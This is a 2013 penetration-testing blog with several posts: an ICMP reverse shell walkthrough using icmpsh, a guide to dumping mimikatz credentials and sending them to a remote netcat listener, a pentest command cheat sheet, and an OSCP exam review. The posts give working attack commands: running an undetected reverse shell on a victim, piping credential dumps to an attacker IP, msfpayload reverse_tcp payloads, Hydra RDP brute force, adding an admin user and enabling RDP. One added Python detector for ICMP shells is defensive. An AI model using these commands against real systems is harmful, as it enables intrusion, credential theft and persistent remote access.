Saturday, 21 December 2013

ICMP Reverse Shell

During penetration tests we regularly come across scenarios where we need a shell on a remote box. The handiest tool is Metasploit's Meterpreter, but most antivirus products detect it, so we quickly need some way around that.

We can try an ICMP reverse shell, which I recently tested on my machine.
Most importantly, it doesn't require administrator access on the target machine, so we can just use it on the fly. (The part that needs root is the master on the attacker's side, because it reads ICMP from a raw socket; the attacker's kernel must also be told not to answer echo requests itself, otherwise its own ping replies collide with the master's.)

I know there are a lot of articles on ICMP shells on the internet, but this is just for quick reference.

Download ICMP Shell from:

1. Upload "icmpsh.exe" to the victim machine; trust me, the antivirus didn't detect it in my case.
2. Execute "icmpsh.exe -t <Attacker's IP> -d 500 -b 30 -s 128" (-t is the master to ping, -d the delay between requests in milliseconds, -b how many unanswered requests to tolerate before quitting, -s the maximum data buffer size in bytes)
3. Start the listener on the attacker machine with "python <attacker's IP> <Victim's IP>"
4. Or you can use the listener script "./", which will generate the Step 2 command for you and start the listener.

(Screenshot: exported shell through ICMP)

(Screenshot: Windows shell)
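As an added example (this is not code from the original post or from icmpsh itself), the Python below builds the kind of echo packets the channel above rides on and runs a small detector over a constructed exchange. The direction of traffic follows the icmpsh README: the client on the victim sends echo requests carrying output, and the master answers with echo replies carrying the next command, which is exactly why the attacker's kernel must be stopped from answering pings itself (sysctl -w net.ipv4.icmp_echo_ignore_all=1 on Linux) before the master starts. All payloads, hostnames and the 0x1234 identifier are made up for the example; the 128-byte buffer is the -s value from step 2.

```python
"""Added example for this post (not icmpsh's own code): it shows how an ICMP
reverse shell rides in the data field of echo packets and gives a small
detector for it.  Traffic direction follows the icmpsh README (client on the
victim sends echo requests, master answers with echo replies carrying the
next command); the sample payloads and identifiers are constructed."""
import struct
from typing import Optional

ICMP_ECHO_REPLY = 0
ICMP_ECHO_REQUEST = 8

# Default data field of Windows ping.exe: "abcdefghijklmnopqrstuvwabcdefghi"
WIN_PING_PAYLOAD = bytes(range(0x61, 0x78)) + bytes(range(0x61, 0x6A))


def icmp_checksum(data: bytes) -> int:
    """RFC 1071 checksum: one's-complement sum of 16-bit words, complemented."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_echo(msg_type: int, ident: int, seq: int, payload: bytes) -> bytes:
    """ICMP header (type, code, checksum, id, seq) followed by the payload.
    The payload is the covert channel: command text one way, output the other."""
    header = struct.pack("!BBHHH", msg_type, 0, 0, ident, seq)
    csum = icmp_checksum(header + payload)
    return struct.pack("!BBHHH", msg_type, 0, csum, ident, seq) + payload


def parse_echo(packet: bytes) -> dict:
    """Split an ICMP packet (IP header already stripped) and verify its checksum."""
    if len(packet) < 8:
        raise ValueError("short ICMP packet")
    msg_type, code, _, ident, seq = struct.unpack("!BBHHH", packet[:8])
    if icmp_checksum(packet) != 0:  # a packet with a valid checksum sums to zero
        raise ValueError("bad ICMP checksum")
    return {"type": msg_type, "code": code, "id": ident, "seq": seq,
            "data": packet[8:]}


def is_suspicious(packet: bytes, max_payload: int = 64) -> Optional[str]:
    """Detector heuristic: genuine ping payloads are a fixed pattern and small,
    whereas a shell carries readable text and, with -s 128 as in step 2,
    larger buffers.  Returns a reason string, or None for ordinary traffic."""
    pkt = parse_echo(packet)
    if pkt["type"] not in (ICMP_ECHO_REQUEST, ICMP_ECHO_REPLY):
        return None
    data = pkt["data"]
    if len(data) > max_payload:
        return "oversized echo payload (%d bytes)" % len(data)
    printable = data and all(0x20 <= b < 0x7F or b in b"\r\n\t" for b in data)
    if printable and data != WIN_PING_PAYLOAD:
        return "readable text in echo payload: %r" % data[:40]
    return None


def shell_exchange() -> list:
    """Constructed icmpsh-style session (three packets) plus one genuine ping."""
    ident = 0x1234  # made-up echo identifier shared by client and master
    return [
        build_echo(ICMP_ECHO_REQUEST, ident, 1, b"C:\\Users\\victim>"),  # client prompt
        build_echo(ICMP_ECHO_REPLY, ident, 1, b"whoami\r\n"),            # master command
        build_echo(ICMP_ECHO_REQUEST, ident, 2, b"lab\\victim\r\nC:\\Users\\victim>"),
        build_echo(ICMP_ECHO_REQUEST, 1, 1, WIN_PING_PAYLOAD),           # real Windows ping
    ]


def scan(packets) -> list:
    """Run the detector over raw ICMP packets; return (index, reason) pairs."""
    hits = []
    for i, p in enumerate(packets):
        reason = is_suspicious(p)
        if reason:
            hits.append((i, reason))
    return hits


if __name__ == "__main__":
    for i, reason in scan(shell_exchange()):
        print("packet %d: %s" % (i, reason))
```

From the defender's seat the same two checks (payload size and readable text in echo data) are cheap to run over captured ICMP, and they will also catch any other text-over-ping tool; tuning max_payload down to the 32 and 56 bytes that Windows and Linux ping actually send trades false positives for coverage.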

For more details you can visit:

Hope this is helpful!

Sunday, 15 December 2013

Mimikatz Logs and Netcat

Imagine a scenario where you have access to Active Directory or a mail server and are able to run mimikatz on the server (this is a practical scenario). I am damn sure you will get a hell of a lot of passwords out of it, maybe thousands, but the problem you may face is that the output of mimikatz is so large that you can't copy it even after increasing your command prompt buffer. I decided to look for ways of saving mimikatz output to a file, found very little information on it, and so decided to write this little article.

Mimikatz Author Webpage Here

Log Mimikatz output using the "log" command:

(Screenshot: using the log command)

(Screenshot: generated log file)

Log Mimikatz output to a file manually:

(Screenshot: batch command method)

Export the Mimikatz shell to a remote machine through Netcat:

(Screenshot: exporting the Mimikatz shell)

(Screenshot: Mimikatz through Netcat)

Export Mimikatz output to a remote console:

(Screenshot: exported Mimikatz output)

(Screenshot: Mimikatz output on the remote console)

(Screenshot: exported Mimikatz output in a file on the remote machine)

List of commands used (mimikatz treats each quoted argument as one command and runs them in order, so "log" is quoted separately from the sekurlsa command):

  • mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords full" exit   (dump to the console)
  • mimikatz.exe "privilege::debug" "log" "sekurlsa::logonpasswords full" exit   (log with no argument writes mimikatz.log in the current directory)
  • mimikatz.exe "privilege::debug" "log d:\log.txt" "sekurlsa::logonpasswords full" exit   (log to a file of your choice)
  • mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords full" exit >> d:\log.txt   (plain console redirection, appending)
  • nc.exe -vv IP 443 -e mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords full" exit   (hand the mimikatz process to the attacker's listener; start nc -lvp 443 on IP first)
  • mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords full" exit | nc.exe -vv IP 443   (pipe only the output to the listener; on the attacker side nc -lvp 443 > log.txt saves it)

Best Netcat cheat sheets from SANS here

I hope this article will be helpful to all of you!

Thursday, 12 December 2013

Linux Privilege Escalation Enumeration Shell Script

I have created a little shell script for Linux privilege escalation enumeration and have uploaded it on GitHub. I am going to add a few more things to the script soon to make it a bit more advanced; I am sure it will help all of us.

Download Scripts:

You can also refer to the script below:

Hope this is helpful; let me know in case it needs modifications, I will be happy to work on it.

Penetration Testing Necessary Links and Handy Commands

I personally need quick access to a few commands and some links while working on penetration testing exercises, so I decided to post the information below on this blog :)

General Links 

Privilege Escalation Links:
Handy Commands:

Scan all ports at a rate of 10000 packets per second:

unicornscan X.X.X.X:a -r10000 -v   (:a = all ports, -r = packets per second, -v = verbose)

Upgrade a limited shell to a TTY, and serve files over HTTP:

python -c 'import pty;pty.spawn("/bin/bash")'   (spawn bash on a pseudo-terminal from a dumb shell)
python -m SimpleHTTPServer   (Python 2; starts an HTTP server on port 8000 serving the current directory)

RDP brute force with Hydra:

hydra -l admin -P /root/Desktop/passwords -S X.X.X.X rdp   (user admin, password list from the file, -S = connect over SSL)

Mount a remote Windows share:

smbmount //X.X.X.X/c$ /mnt/remote/ -o username=user,password=pass,rw   (smbmount is the old smbfs helper; newer systems mount with -t cifs and the same options)

Metasploit Payloads (the trailing letter is the msfpayload output format: X = Windows executable, R = raw):

msfpayload windows/meterpreter/reverse_tcp LHOST=X.X.X.X X > system.exe
msfpayload php/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=443 R > exploit.php
msfpayload windows/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=443 R | msfencode -t asp -o file.asp
msfpayload windows/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=443 R | msfencode -e x86/shikata_ga_nai -b "\x00" -t c   (C shellcode with null bytes avoided)

Plink reverse tunnel (SSH from the victim back to your box):

plink.exe -P 22 -l root -pw "1234" -R 445: X.X.X.X   (-R takes listenport:host:port; the host:port part after 445: is cut off on this line and must be supplied)

Enable RDP Access:

reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0   (allow Terminal Services connections)
netsh firewall set service remoteadmin enable
netsh firewall set service remotedesktop enable   (legacy netsh firewall syntax; Vista and later use netsh advfirewall)

Nmap WebDAV Scanning:

nmap -p80,8080 --script=http-iis-webdav-vuln X.X.X.X

Meterpreter scripts (from an active session):

run getgui -u admin -p 1234   (add the user and enable RDP access for it)
run vnc -p 5043   (inject a VNC payload; -p sets the port)

Add User Windows:

net user test 1234 /add
net localgroup administrators test /add

Mimikatz (dump logon credentials from LSASS; run privilege::debug first):

sekurlsa::logonPasswords full

Compiling Windows exploits on BackTrack:

cd /root/.wine/drive_c/MinGW/bin
wine gcc -o ability.exe /tmp/exploit.c -lwsock32   (MinGW gcc under Wine, linking Winsock)
wine ability.exe   (test run under Wine)

Nasm command:

nasm -f bin -o payload.bin payload.asm   (assemble raw shellcode bytes)

To Be Continued....

Hope it's helpful to all of you!

Tuesday, 10 December 2013

Pentesting With BackTrack (PWB) & Offensive Security Certified Professional (OSCP) Reviews 2013


My OSCP certification journey started on 15th September 2013. It is really a great course, and I really loved it. However, today I became OSCP :)

On "Tue 12/10/2013 7:27 PM" I got an official e-mail from Offensive Security:

Prerequisites :

  1. You must have hands-on experience with Linux as well as Windows.
  2. Web application programming experience should be really helpful, as you can grasp it quickly.
  3. I would say get your hands dirty with Python and shell scripting; it will help you a lot.
  4. "Out of the box" thinking is required; spoon-feeding will not help you.
  5. It is not for bookworms!
  6. Self-learning is very important.
  7. Debugging skills are necessary.
  8. Database knowledge is an advantage; you may get situations where it will be necessary.
  9. Get familiar with BackTrack thoroughly.

OSCP Certification Review Links:

What You Will Need:

  1. I personally recommend BackTrack 5 R3; it has everything you need.
  2. You can go for other distros like GnackTrack if you are familiar with them.
  3. I will post some handy scripts and tools here soon, which you can add and which will save you time.

Signing Up For PWB Course:

I decided to go for PWB (Penetration Testing With BackTrack) in early September. I read as many reviews as I could before signing up. At first I was a bit worried, as I decided to go for the 2-month lab due to office work. Apart from this, the course fee was $950 and the dollar rate was going up while the Indian rupee was falling; I can say it was an overall hard time!

Course Material:

Made up my mind, and finally signed up for the PWB course!! Once you sign up for the course you will get the course material within a few weeks, and it includes videos + a PDF guide.

  1. The course syllabus was really good and well designed; you can check it here.
  2. The videos + PDF are purely conceptual and highly practical.
  3. Go through each and every piece of material and try to replicate it on your local machine.
  4. Loop back through the videos until you are 100% clear about the concept mentioned.

PWB Labs:

The most fun part is the PWB labs, where you get VPN access to the PWB lab, which consists of vulnerable servers. I dove deep into it from my first day and was simultaneously reading the course material; trust me, this is not for those who want spoon-feeding. The course material and the labs are completely different.

The lab consists of different networks (IT, Admin, Development), like a corporate environment, and your goal is to penetrate each network and get "r00t/Admin" access on the servers. From day 1 my goal was to get into the ADMIN department, and after a long wait... patience... and most importantly sleepless nights... I finally did it!

I would recommend playing a minimum of 6-7 hours daily in the PWB labs, which I was fortunate to be able to do while managing my office work (from 7 PM to 2-3 AM at night). Apart from this, you can connect with the community and interact with different people from different regions through the IRC channels.

There came a time while working on the lab when I really started feeling exhausted, and all you can hear from everyone is "Try Harder".

Lab Tips:

  1. I recommend honestly working on the labs; try to get as many hosts as you can.
  2. Try to replicate each and every thing mentioned in the videos and PDF.
  3. If you are not able to r00t some server in the lab, I would say move on to the next; I am sure you will get it later.
  4. I recommend working on the lab documentation; it will definitely prepare you well and will also help you further in your career.
  5. Interact with people over IRC; I am sure you will make some good friends.
  6. Most importantly, don't lose patience while working on any exercise.
  7. If you are not able to find a way, I would say go back to the course material and you will get some direction.
  8. There are some beautiful boxes, don't miss them; set your target to get them.
  9. Try to exploit a box from various perspectives; you will find multiple ways to get in.
  10. Try to look for juicy information on each and every exploited box. It's like "Alibaba and Chalis Chors.... Khul Ja Sim Sim"; you never know what the Offsec team has planted in a machine to surprise you.
  11. If you are neglecting some small "X" thing, I would say visit it once again.
  12. "Try Hard" to get the joy of exploitation.

All I can say is, "A burning desire is the starting point of all accomplishment. Just like a small fire cannot give much heat, a weak desire cannot produce great results." This is where an OffSec student makes a significant difference.


Regarding the exam I won't share any details. All I can say is it's challenging; take it as a challenge and get it.
It's a really tough test of what you have done over the whole course period. I took the complete 24 hours to finish this exam: a sleepless night and a stressed mind. I used to take breaks in between to refresh my mind, but only for 5-10 minutes; a cup of coffee will surely help you get rid of your sleeping habits!

Once I finished the exam I slept for 10 hours, and then started working on the report, which took me around 7 hours. I personally submitted both the lab and the exam documentation.

Within a day and a half the result was positive!... :) and the rest is history!

Exam Tips:

  1. If you have worked on the lab honestly, you will have gathered a bunch of information; I would say compile those links and important, handy commands and sort them carefully, which will save you time in the exam.
  2. Get complete rest before starting the exam, and most importantly keep coffee packets ready!
  3. Read the exam instructions carefully, word by word; don't miss a single word, else it will surely mess you up.
  4. Define the maximum amount of time you will work on each machine; once the time is up, move on to the next box.
  5. I personally took the opposite approach to what others took: I started with the machines that seemed a bit tough for me. If you are not sure about yourself, I would recommend getting the low-valued machines first.
  6. Do not update any tools before the exam, it will mess up their stability; I updated one tool and had to spend 20 minutes on it, but was able to get rid of the problem.
  7. Take backups frequently; who knows, the VM may crash due to something.....
  8. Take as many screenshots as you can, step by step. Don't forget an important screenshot due to excitement; it's natural to get more excited when we get r00t/w00t, and later you realize the screenshots are missing. Name them appropriately, which will save you time while working on the report.
  9. I would say attempt all of them and struggle till the last moment; don't lose patience. At some point you may feel you have enough points to pass the exam, but trust me, it can be an illusion, so always set the goal of attempting all!
  10. Even if you are unable to get complete access, document your steps; it may help you.
  11. Enumeration is the key! If you are unable to find a direction, loop back to the enumeration step.
  12. At some point you will feel you have done it... but when you run it, it will fail. I would say think about the reason behind it, recreate it accordingly and you will succeed.
  13. If way "X" is not working, try "Y", then try "Z"; don't loop back to the same way again and again.
  14. It requires complete madness, the capacity to struggle till the last moment, and most importantly patience!

Documentation Tips:

  1. Include the lab documentation as well with your exam document.
  2. Step-by-step screenshots with appropriate information.
  3. Once finished, go through the documents 2-3 times, and I am sure you will find some small mistakes.
  4. Keep the same format throughout the document, and provide as much information as you can.

Ultimately Remember Few Things:

"The motivation to succeed comes from the burning desire to achieve a purpose"

"Whatever the mind of man can conceive and believe, the mind can achieve"

"The journey to being your best is not easy. It is full of setbacks. Winners have the ability to overcome and bounce back with even greater resolve"

"The best teachers will not give you something to drink, they will make you thirsty. They will put you on a path to seek answers" - For Offensive Security

To Be Continued....